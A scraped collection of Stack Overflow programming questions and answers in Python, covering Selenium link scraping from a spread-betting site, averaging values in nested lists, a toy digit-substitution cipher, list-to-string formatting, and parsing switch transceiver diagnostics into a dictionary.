https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.168fab1f-8360-4e87-ba84-bfbd11a4a207/croatia-v-belgium https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.9fb541f0-43a4-409c-8e54-e34a43965714/costa-rica-v-germany 
https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7379c8a7-ab5d-4653-b487-22bf7ff8eefe/japan-v-spain https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.e7e4c6be-98b7-4258-ba40-74c54a790fe1/ghana-v-uruguay https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.e4c18c81-565e-47ce-b08d-9aed62c88a5d/south-korea-v-portugal https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.18f44028-e23d-48d4-970b-e75c164589bd/cameroon-v-brazil https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.526f9b1b-6d95-4f44-abce-e0a6a30acfd4/serbia-v-switzerland https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany https://www.sportingindex.com/spread-betting/rugby-union/france-top-14/group_a.ad22f34f-9cd6-47b4-a826-0c0f0dce7df2/lyon-v-toulouse https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany https://www.sportingindex.com/spread-betting/rugby-union/france-top-14/group_a.ad22f34f-9cd6-47b4-a826-0c0f0dce7df2/lyon-v-toulouse https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay
Retrieving specific matches from a list in python
from selenium import webdriver from selenium.webdriver.chrome.options import Options from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver import ActionChains from selenium.webdriver.common.by import By from time import sleep from datetime import datetime import pandas as pd import warnings import os os.chdir('C:/Users/paulc/Documents/Medium Football') warnings.filterwarnings('ignore') base_url = 'https://www.sportingindex.com/spread-betting/football/international-world-cup' option = Options() option.headless = False driver = webdriver.Chrome("C:/Users/paulc/Documents/Medium Football/chromedriver.exe",options=option) driver.get(base_url) links = [elem.get_attribute("href") for elem in driver.find_elements(By.TAG_NAME,"a")] this code retrieves all the href links on this page. I want to search the links list and return only the matches that contain 'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a' however I get the AttributeError: 'NoneType' object has no attribute 'startswith' using import re [x for x in links if x.startswith('https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')] help is appreciated.
[ "Instead of collecting all a elements on the page where will be a lot of irrelevant results you can use more precise locator.\nSo, instead of\ndriver.find_elements(By.TAG_NAME,\"a\")\n\nUse this:\ndriver.find_elements(By.XPATH,\"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]\")\n\nThis will give you desired elements only.\nAnd this\nlinks = [elem.get_attribute(\"href\") for elem in driver.find_elements(By.XPATH,\"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]\")]\n\nwill directly give you the wanted links only.\nUPD\nIn case this is giving you an empty list you possibly are missing a delay. So, you can simply add some pause before that line, like time.sleep(2) but it's better to use WebDriverWait expected_conditions explicit waits for that.\nI can't check it since my computer is blocking that link due to my company policy since that is a gambling site, but normally something like this should work:\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\n\nwait = WebDriverWait(driver, 10)\n\nlinks = [elem.get_attribute(\"href\") for elem in wait.until(EC.visibility_of_all_elements_located((By.XPATH, \"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]\")))]\n\n", "The following code is filtering to grab the right links\nimport time\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium import webdriver\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://www.sportingindex.com/spread-betting/football/international-world-cup')\ndriver.maximize_window()\ntime.sleep(8)\n\n\nsoup = BeautifulSoup(driver.page_source,\"lxml\")\nfor u in soup.select('a[class=\"gatracking\"]'):\n link = 'https://www.sportingindex.com' + u.get('href')\n\n if '-v-' in link:\n 
print(link)\n\nOutput:\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.dd7a995d-7478-45f8-af27-9f234d37cc76/ecuador-v-senegal\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.92232207-0f1e-4bb1-bacd-1332ef6b9007/netherlands-v-qatar\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.b913620e-69c7-4606-a153-7b48589b7c94/iran-v-usa\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7a4a18fb-d4ee-4880-849f-f1afdea33cd5/wales-v-england\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.20c098b4-4e97-4fd1-97b0-f42d84424361/australia-v-denmark\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5a7476e2-8d35-4a8e-8065-b4339e79f395/tunisia-v-france\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.8a869f02-9dd0-49c5-91bd-209ee224fc2a/poland-v-argentina\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.6379b787-f246-4ba4-a896-28a97396d02f/saudi-arabia-v-mexico\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.52737cfd-da19-42dd-b15b-c16c3e8e9a86/canada-v-morocco\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.168fab1f-8360-4e87-ba84-bfbd11a4a207/croatia-v-belgium\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.9fb541f0-43a4-409c-8e54-e34a43965714/costa-rica-v-germany\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7379c8a7-ab5d-4653-b487-22bf7ff8eefe/japan-v-spain\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.e7e4c6be-98b7-4258-ba40-74c54a790fe1/ghana-v-uruguay\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.e4c18c81-565e-47ce-b08d-9aed62c88a5d/south-korea-v-portugal\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.18f44028-e23d-48d4-970b-e75c164589bd/cameroon-v-brazil\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.526f9b1b-6d95-4f44-abce-e0a6a30acfd4/serbia-v-switzerland\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56ac
d403d6/brazil-v-switzerland\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany\nhttps://www.sportingindex.com/spread-betting/rugby-union/france-top-14/group_a.ad22f34f-9cd6-47b4-a826-0c0f0dce7df2/lyon-v-toulouse\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany\nhttps://www.sportingindex.com/spread-betting/rugby-union/france-top-14/group_a.ad22f34f-9cd6-47b4-a826-0c0f0dce7df2/lyon-v-toulouse\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay\n\n" ]
[ 2, 0 ]
[]
[]
[ "python", "selenium", "selenium_webdriver", "web_scraping", "xpath" ]
stackoverflow_0074593151_python_selenium_selenium_webdriver_web_scraping_xpath.txt
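For completeness, the AttributeError in the question itself comes from anchors that have no href attribute, so get_attribute("href") returns None for them; guarding the comprehension fixes the original approach without changing the locator. A minimal sketch, assuming links was built exactly as in the question:
prefix = ('https://www.sportingindex.com/spread-betting/'
          'football/international-world-cup/group_a')
# Skip None entries before calling startswith on them
group_a_links = [x for x in links if x is not None and x.startswith(prefix)]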
Q: Turning strings into integers from a mixed, nested list
I need to turn certain values from a nested list of strings into integers and find the average of them for a programming assignment. The list looks like this:
[['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']]

I've tried using for loops to turn them into integers but it returns TypeErrors or empty brackets.
A: The format of the data suggests to me that it's something like a CSV where the first two columns are the player names and the remaining columns are scores, and that the ultimately desired result might be to preserve the names along with the average of the associated scores.
Operating under that assumption, I might convert it into something like this:
>>> data = [['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']]
>>> from statistics import mean
>>> {' '.join(d[:2]): mean(map(int, d[2:])) for d in data}
{'Ty Cobb': 392.3333333333333, 'Chipper Jones': 1812.3333333333333}
Turning strings into integers from a mixed, nested list
I need to turn certain values from a nested list of strings into integers and find the average of them for a programming assignment. The list looks like this: [['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']] I've tried using for loops to turn them into integers but it returns TypeErrors or empty brackets.
[ "The format of the data suggests to me that it's something like a CSV where the first two columns are the player names and the remaining columns are scores, and that the ultimately desired result might be to preserve the names along with the average of the associated scores.\nOperating under that assumption, I might convert it into something like this:\n>>> data = [['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']]\n>>> from statistics import mean\n>>> {' '.join(d[:2]): mean(map(int, d[2:])) for d in data}\n{'Ty Cobb': 392.3333333333333, 'Chipper Jones': 1812.3333333333333}\n\n" ]
[ 1 ]
[]
[]
[ "for_loop", "list", "python" ]
stackoverflow_0074593519_for_loop_list_python.txt
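If the assignment disallows imports such as statistics, the same result can be computed with a plain loop. A minimal sketch under the same first-two-columns-are-names assumption; the function name averages is hypothetical:
def averages(rows):
    result = {}
    for row in rows:
        name = ' '.join(row[:2])                    # e.g. 'Ty Cobb'
        scores = [int(value) for value in row[2:]]  # convert only the numeric columns
        result[name] = sum(scores) / len(scores)
    return result

data = [['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']]
print(averages(data))  # {'Ty Cobb': 392.33..., 'Chipper Jones': 1812.33...}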
Q: Function - encrypt key
I'm trying to create a function that encrypts a 4-digit number entered by the user. I was able to reach this:
while True:
    num = int(input('Insira um valor entre 1000 e 9999: '))
    if num<1000 or num>9999:
        print('Insira um valor válido.')
    else:
        break

num_str = str(num)

def encrypt(num):
    num_encrip = ''
    for i in num_str:
        match i:
            case '1':
                num_encrip = 'a'
            case '2':
                num_encrip = '*'
            case '3':
                num_encrip = 'I'
            case '4':
                num_encrip = 'D'
            case '5':
                num_encrip = '+'
            case '6':
                num_encrip = 'h'
            case '7':
                num_encrip = '@'
            case '8':
                num_encrip = 'c'
            case '9':
                num_encrip = 'Y'
            case '0':
                num_encrip = 'm'
        print(num_encrip, end='')

encrypt(num_str)

And it works fine, but I know this isn't very efficient and using lists should be better. And here I'm stuck, because I can't adapt the code above to use lists...
nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
chars = ['a', '*', 'I', 'D', '+', 'h', '@' 'c', 'Y', 'm']

while True:
    num = int(input('Insira um valor entre 1000 e 9999: '))
    if num<1000 or num>9999:
        print('Insira um valor válido')
    else:
        break

num_str = str(num)

def encrypt():
    pass

encrypt(num_str)

I've tried writing so many things inside the encrypt function, but nothing works... I'm stuck... Any help, please? I know I have to do a for loop... but what exactly? Thank you.
A: With the two lists, I'd suggest making a mapping from the numbers to the chars
nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
chars = ['a', '*', 'I', 'D', '+', 'h', '@', 'c', 'Y', 'm']
correspondances = dict(zip(nums, chars))

def encrip2(value):
    num_encrip = ''
    for c in value:
        num_encrip += correspondances[int(c)]
    print(num_encrip)

And as the indexes are ints, you can directly use them as indexes into the chars
chars = 'ma*ID+h@cY'
def encrip2(value):
    num_encrip = ''
    for c in value:
        num_encrip += chars[int(c)]
    print(num_encrip)
Function - encrypt key
I'm trying to create a function that encrypts a 4-digit number entered by the user. I was able to reach this:
while True:
    num = int(input('Insira um valor entre 1000 e 9999: '))
    if num<1000 or num>9999:
        print('Insira um valor válido.')
    else:
        break

num_str = str(num)

def encrypt(num):
    num_encrip = ''
    for i in num_str:
        match i:
            case '1':
                num_encrip = 'a'
            case '2':
                num_encrip = '*'
            case '3':
                num_encrip = 'I'
            case '4':
                num_encrip = 'D'
            case '5':
                num_encrip = '+'
            case '6':
                num_encrip = 'h'
            case '7':
                num_encrip = '@'
            case '8':
                num_encrip = 'c'
            case '9':
                num_encrip = 'Y'
            case '0':
                num_encrip = 'm'
        print(num_encrip, end='')

encrypt(num_str)

And it works fine, but I know this isn't very efficient and using lists should be better. And here I'm stuck, because I can't adapt the code above to use lists...
nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
chars = ['a', '*', 'I', 'D', '+', 'h', '@' 'c', 'Y', 'm']

while True:
    num = int(input('Insira um valor entre 1000 e 9999: '))
    if num<1000 or num>9999:
        print('Insira um valor válido')
    else:
        break

num_str = str(num)

def encrypt():
    pass

encrypt(num_str)

I've tried writing so many things inside the encrypt function, but nothing works... I'm stuck... Any help, please? I know I have to do a for loop... but what exactly? Thank you.
[ "With the 2 list, I'd suggest making a mapping from the numbers to the chars\nnums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\nchars = ['a', '*', 'I', 'D', '+', 'h', '@', 'c', 'Y', 'm']\ncorrespondances = dict(zip(nums, chars))\n\ndef encrip2(value):\n num_encrip = ''\n for c in value:\n num_encrip += correspondances[int(c)]\n print(num_encrip)\n\nAnd as the indexes are ints, you can directly use them as indexes into the chars\nchars = 'ma*ID+h@cY'\ndef encrip2(value):\n num_encrip = ''\n for c in value:\n num_encrip += chars[int(c)]\n print(num_encrip)\n\n" ]
[ 1 ]
[]
[]
[ "encryption", "function", "python" ]
stackoverflow_0074593536_encryption_function_python.txt
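Another idiomatic route, not shown in the answer above, is str.translate with a table built by str.maketrans, which maps each digit character directly to its cipher character in one pass. A sketch using the substitution from the question:
table = str.maketrans('1234567890', 'a*ID+h@cYm')

def encrypt(num_str):
    # translate() substitutes every character through the table at once
    return num_str.translate(table)

print(encrypt('1234'))  # a*ID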
Q: Convert a dynamically sized list to a f string
I'm trying to take a list that can be size 1 or greater and convert it to a string with formatting "val1, val2, val3 and val4", where you can have different list lengths and the last value will be formatted with an and before it instead of a comma. My current code:
inputlist = ["val1", "val2", "val3"]
outputstr = ""

for i in range(len(inputlist)-1):
    if i == len(inputlist)-1:
        outputstr = outputstr + inputlist[i]
    elif i == len(inputlist)-2:
        outputstr = f"{outputstr + inputlist[i]} and "
    else:
        outputstr = f"{outputstr + inputlist[i]}, "
print(f"Formatted list is: {outputstr}")

Expected result:
Formatted list is: val1, val2 and val3
A: join handles most.
for inputlist in [["1"], ["one", "two"], ["val1", "val2", "val3"]]:
    if len(inputlist) <= 1:
        outputstr = "".join(inputlist)
    else:
        outputstr = " and ".join([", ".join(inputlist[:-1]), inputlist[-1]])
    print(f"Formatted list is: {outputstr}")

Produces
Formatted list is: 1
Formatted list is: one and two
Formatted list is: val1, val2 and val3

A: The range function in python does not include the last element. For example, range(5) gives [0, 1, 2, 3, 4] only; it does not add 5 to the list. So your code should be changed to something like this:
inputlist = ["val1", "val2", "val3"]
outputstr = ""

for i in range(len(inputlist)):
    if i == len(inputlist)-1:
        outputstr = outputstr + inputlist[i]
    elif i == len(inputlist)-2:
        outputstr = f"{outputstr + inputlist[i]} and "
    else:
        outputstr = f"{outputstr + inputlist[i]}, "
print(f"Formatted list is: {outputstr}")

A: Decided to use string methods instead, and it worked perfectly.
outputstr = str(inputlist).replace("'", "").strip("[]")[::-1].replace(",", " and"[::-1], 1)[::-1]
print(f"With the following codes enabled: {outputstr}")
Convert a dynamically sized list to a f string
I'm trying to take a list that can be size 1 or greater and convert it to a string with formatting "val1, val2, val3 and val4" where you can have different list lengths and the last value will be formatted with an and before it instead of a comma. My current code: inputlist = ["val1", "val2", "val3"] outputstr = "" for i in range(len(inputlist)-1): if i == len(inputlist)-1: outputstr = outputstr + inputlist[i] elif i == len(inputlist)-2: outputstr = f"{outputstr + inputlist[i]} and " else: outputstr = f"{outputstr + inputlist[i]}, " print(f"Formatted list is: {outputstr}") Expected result: Formatted list is: val1, val2 and val3
[ "join handles most.\nfor inputlist in [[\"1\"], [\"one\", \"two\"], [\"val1\", \"val2\", \"val3\"]]:\n if len(inputlist) <= 1:\n outputstr = \"\".join(inputlist)\n else:\n outputstr = \" and \".join([\", \".join(inputlist[:-1]), inputlist[-1]])\n print(f\"Formatted list is: {outputstr}\")\n\nProduces\nFormatted list is: 1\nFormatted list is: one and two\nFormatted list is: val1, val2 and val3\n\n", "The range function in python does not include the last element,\nFor example range(5) gives [0, 1, 2, 3, 4] only it does not add 5 in the list,\nSo your code should be changed to something like this:\ninputlist = [\"val1\", \"val2\", \"val3\"]\noutputstr = \"\"\n\nfor i in range(len(inputlist)):\n if i == len(inputlist)-1:\n outputstr = outputstr + inputlist[i]\n elif i == len(inputlist)-2:\n outputstr = f\"{outputstr + inputlist[i]} and \"\n else:\n outputstr = f\"{outputstr + inputlist[i]}, \"\nprint(f\"Formatted list is: {outputstr}\")\n\n", "Decided to use string methods instead, and it worked perfectly.\noutputstr = str(inputlist).replace(\"'\", \"\").strip(\"[]\")[::-1].replace(\",\", \" and\"[::-1], 1)[::-1]\n print(f\"With the following codes enabled: {outputstr}\")\n\n" ]
[ 1, 0, 0 ]
[]
[]
[ "f_string", "list", "python" ]
stackoverflow_0074587672_f_string_list_python.txt
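A compact way to combine join with an f-string, handling the one-element case the loop answers also guard against; format_list is a hypothetical helper name:
def format_list(items):
    if len(items) <= 1:
        return ''.join(items)
    # Comma-join everything except the last item, then append " and last"
    return f"{', '.join(items[:-1])} and {items[-1]}"

print(f"Formatted list is: {format_list(['val1', 'val2', 'val3'])}")
# Formatted list is: val1, val2 and val3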
Q: Python convert switch data (text) to dict
I have the following data, which I receive via an SSH session to a switch. I wish to convert the input, which is text, to a dict for easy access and the possibility to monitor certain values. I cannot get the data extracted without a ton of splits and regexes and still get stuck.
Port : 1
    Media Type : SF+_SR
    Vendor Name : VENDORX
    Part Number : SFP-10G-SR
    Serial Number : Gxxxxxxxx
    Wavelength: 850 nm
    Temp (Celsius) : 37.00    Status : Normal
          Low Warn Threshold : -40.00    High Warn Threshold : 85.00
          Low Alarm Threshold : -50.00   High Alarm Threshold : 100.00
    Voltage AUX-1/Vcc (Volts) : 3.27    Status : Normal
          Low Warn Threshold : 3.10    High Warn Threshold : 3.50
          Low Alarm Threshold : 3.00   High Alarm Threshold : 3.60
    Tx Power (dBm) : -3.11    Status : Normal
          Low Warn Threshold : -7.30    High Warn Threshold : 2.00
          Low Alarm Threshold : -9.30   High Alarm Threshold : 3.00
    Rx Power (dBm) : -4.68    Status : Normal
          Low Warn Threshold : -11.10    High Warn Threshold : 2.00
          Low Alarm Threshold : -13.10   High Alarm Threshold : 3.00
    Tx Bias Current (mA): 6.27    Status : Normal
          Low Warn Threshold : 0.00    High Warn Threshold : 12.00
          Low Alarm Threshold : 0.00   High Alarm Threshold : 15.00
Port : 2
    Media Type : SF+_SR
    Vendor Name : VENDORY
    Part Number : SFP-10G-SR
    Serial Number : Gxxxxxxxx
    Wavelength : 850 nm
    Temp (Celsius) : 37.00    Status : Normal
..... etc - till port 48

Which I want to convert to:
[
    {
        "port": "1",
        "vendor": "VENDORX",
        "media_type": "SF+_SR",
        "part_number": "SFP-10G-SR",
        "serial_number": "Gxxxxxxxx",
        "wavelength": "850 nm",
        "temp": {
            "value": "37.00",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        "voltage_aux-1": {
            "value": "3.27",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        "tx_power": {
            "value": "-3.11",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        "rx_power": {
            "value": "-4.68",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        "tx_bias_current": {
            "value": "6.27",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
    },
    {
        "port": "2",
        "vendor": "VENDORY",
        "media_type": "SF+_SR",
        "part_number": "SFP-10G-SR",
        "serial_number": "Gxxxxxxxx",
        "wavelength": "850 nm",
        "temp": {
            "value": "37.00",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        ...... etc
    },
]
A: Updated (Complete rewrite and simplification).
Here are some ideas for you -- adjust to taste.
The solution herein tries to avoid using "domain specific knowledge" as much as possible. The only assumptions are:

Empty lines don't matter.
Indentation is meaningful.
Keys are transformed to lowercase, and some content is removed (stuff in parentheses, 'name', 'threshold', and /...).
When a line has multiple "key : value" pairs or is followed by an indented group of lines, that is a block of information pertaining to the first key.

Ultimately, when a key has multiple values (e.g. 'port'), then these values are put together as a list. When a key has a value that is a single dict (like for 'temp'), then the first key of that dict (the same as the key itself) is replaced by 'value'. Thus, we will see:

{'port': [{'port': 1, ...}, {'port': 2, ...}, ...]}, but
{'temp': {'value': 37, ...}}.

Records
We start by splitting each line into (key, value) pairs and note the indentation of the line. The result is a list of records, each containing: (indent, [(k0, v0), ...]):
import re

def proc_kv(k, v):
    k = re.sub(r'\(.*\)', '', k.lower())
    k = re.sub(r' (?:name|threshold)', '', k)
    k = re.sub(r'/\S+', '', k)
    k = '_'.join(k.strip().split())
    for typ in (int, float):
        try:
            v = typ(v)
            break
        except ValueError:
            pass
    return k, v

def proc_line(s):
    s = re.sub(r'\t', ' ' * 4, s)  # handle tabs if any
    # split into one or more key-value pairs
    p = [e.strip() for e in re.split(r':', s)]
    if len(p) < 2:
        return None
    # if there are several pairs, use the largest space
    # to split '{v[i]} {k[i+1]}'
    p = [p[0]] + [
        e for x in p[1:-1]
        for e in x.split(max(re.split(r'( +)', x)[1::2]), maxsplit=1)
    ] + [p[-1]]
    kv_pairs = [proc_kv(k, v) for k, v in zip(p[::2], p[1::2])]
    # figure out the indentation of that line
    indent = len(s) - len(s.lstrip(' '))
    return indent, kv_pairs

Example on your text:
records = [r for r in [proc_line(s) for s in txt.splitlines()] if r]
>>> records
[(0, [('port', 1)]),
 (4, [('media_type', 'SF+_SR')]),
 (4, [('vendor', 'VENDORX')]),
 (4, [('part_number', 'SFP-10G-SR')]),
 (4, [('serial_number', 'Gxxxxxxxx')]),
 (4, [('wavelength', '850 nm')]),
 (4, [('temp', 37.0), ('status', 'Normal')]),
 (10, [('low_warn', -40.0), ('high_warn', 85.0)]),
 ...

Note that not only keys but also values may contain spaces (e.g. 'Wavelength : 850 nm'). We decided to use the largest space to split intermediary '{v[i] k[i+1]}' substrings. Thus:
>>> proc_line('  a b : 34 nm    c d : 4 ft')
(2, [('a_b', '34 nm'), ('c_d', '4 ft')])

# but
>>> proc_line('  a b : 34 nm c d : 4 ft')
(2, [('a_b', 34), ('nm_c_d', '4 ft')])

Blocks
We then construct a hierarchical representation of the records in a way that takes indentation into account:
def get_blocks(records, parent=None):
    indent, _ = records[0]
    starts = [i for i, (o_indent, _) in enumerate(records) if o_indent == indent]
    block = [] if parent is None else parent.copy()
    continuation_block = len(block) > 1
    for i, j in zip(starts, starts[1:] + [len(records)]):
        _, kv = records[i]
        continuation_block &= (single_line := i + 1 == j)
        if continuation_block:
            block += kv
        elif single_line:
            block += [(kv[0][0], kv)] if len(kv) > 1 else kv
        else:
            block.append((kv[0][0], get_blocks(records[i+1:j], parent=kv)))
    return block

Example on the records above (obtained from your txt):
blocks = get_blocks(records)
>>> blocks
[('port',
  [('port', 1),
   ('media_type', 'SF+_SR'),
   ('vendor', 'VENDORX'),
   ('part_number', 'SFP-10G-SR'),
   ('serial_number', 'Gxxxxxxxx'),
   ('wavelength', '850 nm'),
   ('temp',
    [('temp', 37.0),
     ...

Note the repeated first key in sub blocks (e.g. ('port', [('port', 1), ...]) and ('temp', [('temp', 37.0), ...])).
Final structure
We then transform the blocks hierarchical structure into a dict, with some ad-hoc logic (no clobbering (k, v) pairs that have the same key, etc.). And finally put all the pieces together in a proc_txt() function:
def reshape(a):
    if isinstance(a, list) and len(a) == 1:
        a = a[0]
    if isinstance(a, dict):
        a = {'value' if i == 0 else k: v for i, (k, v) in enumerate(a.items())}
    return a

def to_dict(blocks):
    if not isinstance(blocks, list):
        return blocks
    d = {}
    for k, v in blocks:
        d[k] = d.get(k, []) + [to_dict(v)]
    return {k: reshape(v) for k, v in d.items()}

def proc_txt(txt):
    records = [r for r in [proc_line(s) for s in txt.splitlines()] if r]
    blocks = get_blocks(records)
    d = to_dict(blocks)
    return d

Example on your text
>>> proc_txt(txt)
{'port': [{'port': 1,
           'media_type': 'SF+_SR',
           'vendor': 'VENDORX',
           'part_number': 'SFP-10G-SR',
           'serial_number': 'Gxxxxxxxx',
           'wavelength': '850 nm',
           'temp': {'value': 37.0,
                    'status': 'Normal',
                    'low_warn': -40.0,
                    'high_warn': 85.0,
                    'low_alarm': -50.0,
                    'high_alarm': 100.0},
           ...
]}
Python convert switch data (text) to dict
I have the following data, which I receive via an SSH session to a switch. I wish to convert the input, which is text, to a dict for easy access and the possibility to monitor certain values. I cannot get the data extracted without a ton of splits and regexes and still get stuck.
Port : 1
    Media Type : SF+_SR
    Vendor Name : VENDORX
    Part Number : SFP-10G-SR
    Serial Number : Gxxxxxxxx
    Wavelength: 850 nm
    Temp (Celsius) : 37.00    Status : Normal
          Low Warn Threshold : -40.00    High Warn Threshold : 85.00
          Low Alarm Threshold : -50.00   High Alarm Threshold : 100.00
    Voltage AUX-1/Vcc (Volts) : 3.27    Status : Normal
          Low Warn Threshold : 3.10    High Warn Threshold : 3.50
          Low Alarm Threshold : 3.00   High Alarm Threshold : 3.60
    Tx Power (dBm) : -3.11    Status : Normal
          Low Warn Threshold : -7.30    High Warn Threshold : 2.00
          Low Alarm Threshold : -9.30   High Alarm Threshold : 3.00
    Rx Power (dBm) : -4.68    Status : Normal
          Low Warn Threshold : -11.10    High Warn Threshold : 2.00
          Low Alarm Threshold : -13.10   High Alarm Threshold : 3.00
    Tx Bias Current (mA): 6.27    Status : Normal
          Low Warn Threshold : 0.00    High Warn Threshold : 12.00
          Low Alarm Threshold : 0.00   High Alarm Threshold : 15.00
Port : 2
    Media Type : SF+_SR
    Vendor Name : VENDORY
    Part Number : SFP-10G-SR
    Serial Number : Gxxxxxxxx
    Wavelength : 850 nm
    Temp (Celsius) : 37.00    Status : Normal
..... etc - till port 48

Which I want to convert to:
[
    {
        "port": "1",
        "vendor": "VENDORX",
        "media_type": "SF+_SR",
        "part_number": "SFP-10G-SR",
        "serial_number": "Gxxxxxxxx",
        "wavelength": "850 nm",
        "temp": {
            "value": "37.00",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        "voltage_aux-1": {
            "value": "3.27",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        "tx_power": {
